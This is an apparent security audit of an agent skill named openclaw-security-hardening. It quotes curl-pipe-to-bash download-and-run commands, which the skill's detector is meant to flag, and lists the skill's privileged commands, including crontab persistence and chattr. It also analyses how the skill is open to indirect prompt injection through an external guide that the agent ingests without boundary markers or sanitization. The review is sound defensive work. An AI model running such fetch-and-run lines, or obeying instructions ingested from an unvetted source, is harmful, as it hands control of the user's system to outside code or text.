The Agent Skills Directory

[REMOTE_CODE_EXECUTION]: The skill documentation includes examples of dangerous remote code execution patterns, specifically curl https://unknown-domain.com/script.sh | bash and curl http://example.com/setup.sh | bash. These are documented as 'Yellow Line' examples that the agent's defense mechanism should detect and flag for review, rather than instructions for the agent to execute unconditionally.
[COMMAND_EXECUTION]: The skill requires the agent to execute several high-privilege system commands to implement hardening, including:
chattr +i: Used to make critical configuration files and the hash baseline immutable.
crontab: Used to install a persistent nightly security audit script.
md5sum: Used to generate and verify file integrity baselines.
git: Used for disaster recovery and repository management.
[EXTERNAL_DOWNLOADS]: The skill clones the security guide from the SlowMist official GitHub repository (https://github.com/slowmist/openclaw-security-practice-guide.git). SlowMist is a recognized security firm, and this download is central to the skill's purpose.
[PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection as it ingests and processes content from an external repository (the security guide) to define its behavior and safety rules.
Ingestion points: Reads instructions from docs/OpenClaw-Security-Practice-Guide-v2.8.md inside the cloned repository.
Boundary markers: None; the agent is instructed to 'assimilate' the guide directly into its context.
Capability inventory: The skill possesses significant capabilities including file system modification (chattr, cat), persistence via crontab, and network access via git and curl (referenced in examples).
Sanitization: None; the skill relies on the integrity of the external documentation source.

openclaw-security-hardening